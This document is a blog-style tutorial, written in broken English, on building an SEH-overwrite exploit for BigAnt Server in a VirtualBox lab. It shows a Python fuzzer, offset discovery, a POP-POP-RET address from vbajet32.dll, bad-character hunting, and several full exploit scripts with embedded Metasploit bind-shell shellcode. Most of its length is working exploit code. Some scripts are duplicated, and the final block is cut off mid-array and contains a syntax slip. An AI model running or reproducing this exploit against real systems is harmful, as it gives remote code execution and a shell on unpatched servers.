this article is about, what all i do to expoits big ant server, big ant server offers secure instant messaging, file transfer, voip, video chat, web conferencing and more. and before you must know what is SEH and SafeSeh.because in this exploits associated with it SEH is a mechanism that owned a software and hardware in exception handling. exception will appear when an application try to execute code in the outside of normal code path and SafeSeh is a linker option that ussulay by proggramer when compile an aplication, its use to keep register address of seh in the module.
install ant big server on Virtual box
before we must know how the big ant server works, when apllication runinng and make transfer data, its contain header packet like USR,USV,LSV etc.
then i try to make fuzzer, its contain command USV Packet , i try to send 2500 byte data into big ant in USV Packet form. i make using python :
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "+"\x41" * 2500 +"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
the on windows xp in virtual box run big ant server , then run ollydbg and then attach antserver process
then run the fuzzer from backtrack,
you can see, that buffer has sent by fuzzer not overwrite EIP, why its can happend? its coused big ant have SEH, then open seh chain in view menu on ollydbg to view SEH
then press shift+F9 to continue this buffer into memory
after buffer forwarded from seh chain into memory, EIP overwriten by A or 41 has sent. then to look data in the memory of apliacation after buffer sent, look windows stack on ollydbg, i find third line of stack is filled by character has sent by fuzzer, in this line right click and press follow in dump
this showing that memory filled by buffer has sent.
because this aplication have SEH, to exploits big ant is by overwrite seh with pop, pop, return command.
next search address that contains pop,pop,return command for overwrite seh. we can use any module that installed in big ant or in windows that load by big ant when running. in this i choose vbajet32.dll that module is installed in windows. to check what this module have SEH or SafeSEH i use msfpescan on metasploits
this msfpesscan showing that vbajet32.dll not have SEH or SafeSEH it show by byte number two if byte number two is contain character 4,5,6,7,C,E,F.
then search pop,popo,return command in vbajet32.dll, to search its do press view menu on olylydbg > executable module > then double click vbajet32.dll then right click > search for > sequence command then insert command POP r32, POP r32, RETN
then press find
that blocked is pop,pop,return addres.
then search byte number in buffer that overwrite SEH address, i use pattern_create to make dummies string then include that string into fuzzer
then edit fuzzer
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4A
b5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad
3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1
Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0
Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0
Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0A
l1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am
9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7
Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5
Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4
As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3A
u4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2
Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A
y1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0
Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8B
b9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7B
d8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7
Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh
6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj
8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8B
l9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn
6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4B
p5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3B
r4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt
4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3
Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1
Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz
1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C
b1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd
0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce
9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9
Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj
0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1
Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0
Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9
Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq
8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8
Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8
Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw
7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6C
y7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6D
a7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5
Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De
4De5De6De7De8De9Df0Df1Df2D"+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
then run run ant big server and attach this ant server form ollydbg again, then run the fuzzer, to by pass seh protection, open seh chain end press shift+F9
that EIP is overwriten by 42326742, to know byte number of this, use pattern_offset
to check this byte number is true, edit fuzzer as below :
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
then run run ant big server and attach this ant server form ollydbg again, then run the fuzzer,then i open ollydbg and look seh chain
this seh chain is overwriten by 41414141, so that byte number is true,,,
then input offset address from vbajet32.ddl into fuzzer, edit fuzzer as below
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
then make breakpoint on seh address, then run run ant big server and attach this ant server form ollydbg again, then run the fuzzer and open SEH chain. seh chain designate to vbajet32.dll then press shift+F9, then press F7 until RETN command.
couse memory only 4 byte and this not enough to saving shellcode, press in first memory address of \xcc then press follow in dump > selection to get free memory space.
use command jmp short to designate cpu process designate free space and to send command to overwrite seh.
then make shellcode using metasploits frameworks, i use bind shell, setting as below :
then insert this shellcode into fuzzer
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6, NOP Padding
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+="\x90" * 16 #nop padding before shelcode
buffer+=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x23"
"\x7e\xf3\xfd\x83\xeb\xfc\xe2\xf4\xdf\x14\x18\xb0\xcb\x87\x0c\x02"
"\xdc\x1e\x78\x91\x07\x5a\x78\xb8\x1f\xf5\x8f\xf8\x5b\x7f\x1c\x76"
"\x6c\x66\x78\xa2\x03\x7f\x18\xb4\xa8\x4a\x78\xfc\xcd\x4f\x33\x64"
"\x8f\xfa\x33\x89\x24\xbf\x39\xf0\x22\xbc\x18\x09\x18\x2a\xd7\xd5"
"\x56\x9b\x78\xa2\x07\x7f\x18\x9b\xa8\x72\xb8\x76\x7c\x62\xf2\x16"
"\x20\x52\x78\x74\x4f\x5a\xef\x9c\xe0\x4f\x28\x99\xa8\x3d\xc3\x76"
"\x63\x72\x78\x8d\x3f\xd3\x78\xbd\x2b\x20\x9b\x73\x6d\x70\x1f\xad"
"\xdc\xa8\x95\xae\x45\x16\xc0\xcf\x4b\x09\x80\xcf\x7c\x2a\x0c\x2d"
"\x4b\xb5\x1e\x01\x18\x2e\x0c\x2b\x7c\xf7\x16\x9b\xa2\x93\xfb\xff"
"\x76\x14\xf1\x02\xf3\x16\x2a\xf4\xd6\xd3\xa4\x02\xf5\x2d\xa0\xae"
"\x70\x2d\xb0\xae\x60\x2d\x0c\x2d\x45\x16\xe2\xa1\x45\x2d\x7a\x1c"
"\xb6\x16\x57\xe7\x53\xb9\xa4\x02\xf5\x14\xe3\xac\x76\x81\x23\x95"
"\x87\xd3\xdd\x14\x74\x81\x25\xae\x76\x81\x23\x95\xc6\x37\x75\xb4"
"\x74\x81\x25\xad\x77\x2a\xa6\x02\xf3\xed\x9b\x1a\x5a\xb8\x8a\xaa"
"\xdc\xa8\xa6\x02\xf3\x18\x99\x99\x45\x16\x90\x90\xaa\x9b\x99\xad"
"\x7a\x57\x3f\x74\xc4\x14\xb7\x74\xc1\x4f\x33\x0e\x89\x80\xb1\xd0"
"\xdd\x3c\xdf\x6e\xae\x04\xcb\x56\x88\xd5\x9b\x8f\xdd\xcd\xe5\x02"
"\x56\x3a\x0c\x2b\x78\x29\xa1\xac\x72\x2f\x99\xfc\x72\x2f\xa6\xac"
"\xdc\xae\x9b\x50\xfa\x7b\x3d\xae\xdc\xa8\x99\x02\xdc\x49\x0c\x2d"
"\xa8\x29\x0f\x7e\xe7\x1a\x0c\x2b\x71\x81\x23\x95\x5d\xa6\x11\x8e"
"\x70\x81\x25\x02\xf3\x7e\xf3\xfd")
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6, NOP Padding
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+="\x90" * 16 #nop padding before shelcode
buffer+=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x23"
"\x7e\xf3\xfd\x83\xeb\xfc\xe2\xf4\xdf\x14\x18\xb0\xcb\x87\x0c\x02"
"\xdc\x1e\x78\x91\x07\x5a\x78\xb8\x1f\xf5\x8f\xf8\x5b\x7f\x1c\x76"
"\x6c\x66\x78\xa2\x03\x7f\x18\xb4\xa8\x4a\x78\xfc\xcd\x4f\x33\x64"
"\x8f\xfa\x33\x89\x24\xbf\x39\xf0\x22\xbc\x18\x09\x18\x2a\xd7\xd5"
"\x56\x9b\x78\xa2\x07\x7f\x18\x9b\xa8\x72\xb8\x76\x7c\x62\xf2\x16"
"\x20\x52\x78\x74\x4f\x5a\xef\x9c\xe0\x4f\x28\x99\xa8\x3d\xc3\x76"
"\x63\x72\x78\x8d\x3f\xd3\x78\xbd\x2b\x20\x9b\x73\x6d\x70\x1f\xad"
"\xdc\xa8\x95\xae\x45\x16\xc0\xcf\x4b\x09\x80\xcf\x7c\x2a\x0c\x2d"
"\x4b\xb5\x1e\x01\x18\x2e\x0c\x2b\x7c\xf7\x16\x9b\xa2\x93\xfb\xff"
"\x76\x14\xf1\x02\xf3\x16\x2a\xf4\xd6\xd3\xa4\x02\xf5\x2d\xa0\xae"
"\x70\x2d\xb0\xae\x60\x2d\x0c\x2d\x45\x16\xe2\xa1\x45\x2d\x7a\x1c"
"\xb6\x16\x57\xe7\x53\xb9\xa4\x02\xf5\x14\xe3\xac\x76\x81\x23\x95"
"\x87\xd3\xdd\x14\x74\x81\x25\xae\x76\x81\x23\x95\xc6\x37\x75\xb4"
"\x74\x81\x25\xad\x77\x2a\xa6\x02\xf3\xed\x9b\x1a\x5a\xb8\x8a\xaa"
"\xdc\xa8\xa6\x02\xf3\x18\x99\x99\x45\x16\x90\x90\xaa\x9b\x99\xad"
"\x7a\x57\x3f\x74\xc4\x14\xb7\x74\xc1\x4f\x33\x0e\x89\x80\xb1\xd0"
"\xdd\x3c\xdf\x6e\xae\x04\xcb\x56\x88\xd5\x9b\x8f\xdd\xcd\xe5\x02"
"\x56\x3a\x0c\x2b\x78\x29\xa1\xac\x72\x2f\x99\xfc\x72\x2f\xa6\xac"
"\xdc\xae\x9b\x50\xfa\x7b\x3d\xae\xdc\xa8\x99\x02\xdc\x49\x0c\x2d"
"\xa8\x29\x0f\x7e\xe7\x1a\x0c\x2b\x71\x81\x23\x95\x5d\xa6\x11\x8e"
"\x70\x81\x25\x02\xf3\x7e\xf3\xfd")
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
then run run ant big server and attach this ant server form ollydbg again, set breakpoinn on seh address, then run the fuzzer, and open seh chain
seh chain not designate to vbajet32.dll, so that address is false.
then remove shellcode in the fuzzer, then run run ant big server and attach
this ant server form ollydbg again, set breakpoinn on seh address, then
run the fuzzer, and open seh chain
seh chain designate to vbajet32.dll, so that error in shellcode, maybe shell code have bad character.
then we must find bad character, to find that make opcode from \x01 to \xff
using scripts generatecodes.pl
then input this opcode into fuzzer, then run run ant big server and attach this ant server form ollydbg again, set breakpoinn on seh address, then run the fuzzer, and open seh chain
this chain seh not designate to vbajet32.dll, so that this shellcode included bad character, then try to cut code "\x01" to "\x11" then insert into fuzzer
then run run ant big server and attach
this ant server form ollydbg again, set breakpoinn on seh address, then
run the fuzzer, and open seh chain
this chain seh designate to
vbajet32.dll, so that this shellcode not included bad character, then add code from "\x12" to "\x20" into fuzzer
then run run ant big server and attach
this ant server form ollydbg again, set breakpoinn on seh address, then
run the fuzzer, and open seh chain
this chain seh not designate to
vbajet32.dll, so that this code from "\x12" to "\x20" included bad character, then try to
cut code "\x12" to "\x19" then insert into fuzzer then run run ant big server and attach
this ant server form ollydbg again, set breakpoinn on seh address, then
run the fuzzer, and open seh chain
then generate opcode using generatecodes.pl again and add "\x20" as bad charackter,
then edit fuzzer as below
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6, NOP Padding
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21"
"\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e"
"\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d"
"\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c"
"\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b"
"\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a"
"\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99"
"\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8"
"\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7"
"\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6"
"\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5"
"\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
"\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3"
"\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
hen run run ant big server and attach this ant server form ollydbg again, set breakpoinn on seh address, then run the fuzzer, and open seh chain
then search other bad character, run big ant and attach from ollydbg, choose file vbajet32.dll on executable module, then from addres vbajet32.dll pres go to menu >expression, then run fuzzer. when big ant break press shift+F9 and press F7 until position JMP SHORT,
then press F7 to go into memory, then dump buffer memory
then copy data buffer from 01 to FF to binary code, with selected buffer from 01 to FF then press right > binary > binary copy then save this binary file into memory.txt,
01 02 03 04 05 06 07 08 09 0B 0C 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 21 22 23
24 57 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42 43 44 45
46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62 63 64 65
66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F 80 81 82 83 84 85
86 87 88 89 8A 8B 8C 8D 8E 8F 90 91 92 93 94 95 96 97 98 99 9A 9B 9C 9D 9E 9F A0 A1 A2 A3 A4 A5
A6 A7 A8 A9 AA AB AC AD AE AF B0 B1 B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 C1 C2 C3 C4 C5
C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 E2 E3 E4 E5
E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF
then make opcode from 01 to FF with bad character 00,0a,0d,20 and save into shellcode.txt
24 57 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40 41 42 43 44 45
46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 5B 5C 5D 5E 5F 60 61 62 63 64 65
66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 7B 7C 7D 7E 7F 80 81 82 83 84 85
86 87 88 89 8A 8B 8C 8D 8E 8F 90 91 92 93 94 95 96 97 98 99 9A 9B 9C 9D 9E 9F A0 A1 A2 A3 A4 A5
A6 A7 A8 A9 AA AB AC AD AE AF B0 B1 B2 B3 B4 B5 B6 B7 B8 B9 BA BB BC BD BE BF C0 C1 C2 C3 C4 C5
C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 E2 E3 E4 E5
E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF
then make opcode from 01 to FF with bad character 00,0a,0d,20 and save into shellcode.txt
then compare opcode in memory.txt and shellcode.txt using comparememory.pl
it show that have different opcode in buffer with opcode that generate using generatecodes.pl, when i look result of dump memory again, that showing that codes 25 changed with 57
then repeated the previous step with add code 25 when generate opcode using generatedcodes.pl, then compare again
no result, so that 25 is bad character.
then make payload using metasploits console again with bad character 00,0a,0d,20,25
then insert this payload into fuzzer
#/usr/bin/pythom
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6, NOP Padding
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
import socket
target_address="192.168.43.2"
target_port=6660
buffer="USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90" # JMP SHORT 6, NOP Padding
buffer+="\x6A\x19\x9A\x0F" # alamat SEH Overwrite 0F9A196A POP EBP, POP EBX, RETNM file vbajet32.dll
buffer+="\x90" 16 #nop padding before shelcode
buffer+=("\xb8\x32\x57\xbd\x31\x2b\xc9\xb1\x51\xda\xcf\xd9\x74\x24\xf4\x5a"
"\x31\x42\x0e\x83\xc2\x04\x03\x70\x5d\x5f\xc4\x88\x0b\x74\x6a\x98"
"\x35\x75\x8a\xa7\xa6\x01\x19\x73\x03\x9d\xa7\x47\xc0\xdd\x22\xcf"
"\xd7\xf2\xa6\x60\xc0\x87\xe6\x5e\xf1\x7c\x51\x15\xc5\x09\x63\xc7"
"\x17\xce\xfd\xbb\xdc\x0e\x89\xc4\x1d\x44\x7f\xcb\x5f\xb2\x74\xf0"
"\x0b\x61\x5d\x73\x51\xe2\xc2\x5f\x98\x1e\x9a\x14\x96\xab\xe8\x75"
"\xbb\x2a\x04\x8a\xef\xa7\x53\xe0\xcb\xab\x02\x3b\x22\x0f\xa0\x30"
"\x06\x9f\xa2\x06\x85\x54\xc4\x9a\x38\xe1\x65\xaa\x1c\x9e\xeb\xe4"
"\xae\xb2\xa4\x07\x78\x2c\x16\x91\xed\x82\xaa\x35\x99\x97\xf8\x9a"
"\x31\xa7\x2d\x4c\x71\xba\x32\xb7\xd5\xba\x1d\x98\x5c\xa1\xc4\xa7"
"\xb2\x22\x0b\xf2\x26\x31\xf4\x2c\xde\xec\x03\x39\xb2\x58\xeb\x17"
"\x9e\x35\x40\xc4\x72\xf9\x35\xa9\x27\x02\x69\x4b\xa0\xed\xd6\xf5"
"\x63\x87\x06\x6c\xeb\x33\xd2\xfe\x2b\x6c\x1c\x28\xd9\x83\xb3\x81"
"\xe1\x74\x5b\x8d\xb3\x5b\x75\x9a\x34\x75\xd6\x71\x34\xaa\xb1\x9c"
"\x83\xcd\x0b\x09\xeb\x04\xdb\xe1\x47\xfc\x23\xd9\xfb\x96\x3c\xa0"
"\x3d\x1f\x94\xad\x14\xb5\xe5\x81\xff\x5c\x7e\x47\x68\xc2\x13\x0e"
"\x8d\x6e\xbc\x49\x67\xa3\xb5\x8e\x1d\x7f\x4f\xb2\xd3\xbf\xbc\x98"
"\xea\x02\x6e\x22\x50\xaf\xe3\x57\x2f\x97\xa8\xcc\x7b\x8f\xdc\xec"
"\xcf\x46\xde\x65\x74\x98\xf6\xde\x23\x34\xa6\xb1\x9a\xd2\x49\x60"
"\x4c\x76\x1b\x7d\xbe\x10\x36\x58\x3a\x2f\x1b\xa5\x93\xc5\x63\xa6"
"\x2b\xe5\x4c\xd3\x03\xe5\xee\x27\xcf\xea\x27\xf5\xef\xc5\xa0\x87"
"\xd7\x04\x43\x24\x17\x1e\x5b\x1a"
)
buffer+="\x90" * (2504 - len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("send EVIL")
sock.close()
print("finish")
buffer+=("\xb8\x32\x57\xbd\x31\x2b\xc9\xb1\x51\xda\xcf\xd9\x74\x24\xf4\x5a"
"\x31\x42\x0e\x83\xc2\x04\x03\x70\x5d\x5f\xc4\x88\x0b\x74\x6a\x98"
"\x35\x75\x8a\xa7\xa6\x01\x19\x73\x03\x9d\xa7\x47\xc0\xdd\x22\xcf"
"\xd7\xf2\xa6\x60\xc0\x87\xe6\x5e\xf1\x7c\x51\x15\xc5\x09\x63\xc7"
"\x17\xce\xfd\xbb\xdc\x0e\x89\xc4\x1d\x44\x7f\xcb\x5f\xb2\x74\xf0"
"\x0b\x61\x5d\x73\x51\xe2\xc2\x5f\x98\x1e\x9a\x14\x96\xab\xe8\x75"
"\xbb\x2a\x04\x8a\xef\xa7\x53\xe0\xcb\xab\x02\x3b\x22\x0f\xa0\x30"
"\x06\x9f\xa2\x06\x85\x54\xc4\x9a\x38\xe1\x65\xaa\x1c\x9e\xeb\xe4"
"\xae\xb2\xa4\x07\x78\x2c\x16\x91\xed\x82\xaa\x35\x99\x97\xf8\x9a"
"\x31\xa7\x2d\x4c\x71\xba\x32\xb7\xd5\xba\x1d\x98\x5c\xa1\xc4\xa7"
"\xb2\x22\x0b\xf2\x26\x31\xf4\x2c\xde\xec\x03\x39\xb2\x58\xeb\x17"
"\x9e\x35\x40\xc4\x72\xf9\x35\xa9\x27\x02\x69\x4b\xa0\xed\xd6\xf5"
"\x63\x87\x06\x6c\xeb\x33\xd2\xfe\x2b\x6c\x1c\x28\xd9\x83\xb3\x81"
"\xe1\x74\x5b\x8d\xb3\x5b\x75\x9a\x34\x75\xd6\x71\x34\xaa\xb1\x9c"
"\x83\xcd\x0b\x09\xeb\x04\xdb\xe1\x47\xfc\x23\xd9\xfb\x96\x3c\xa0"
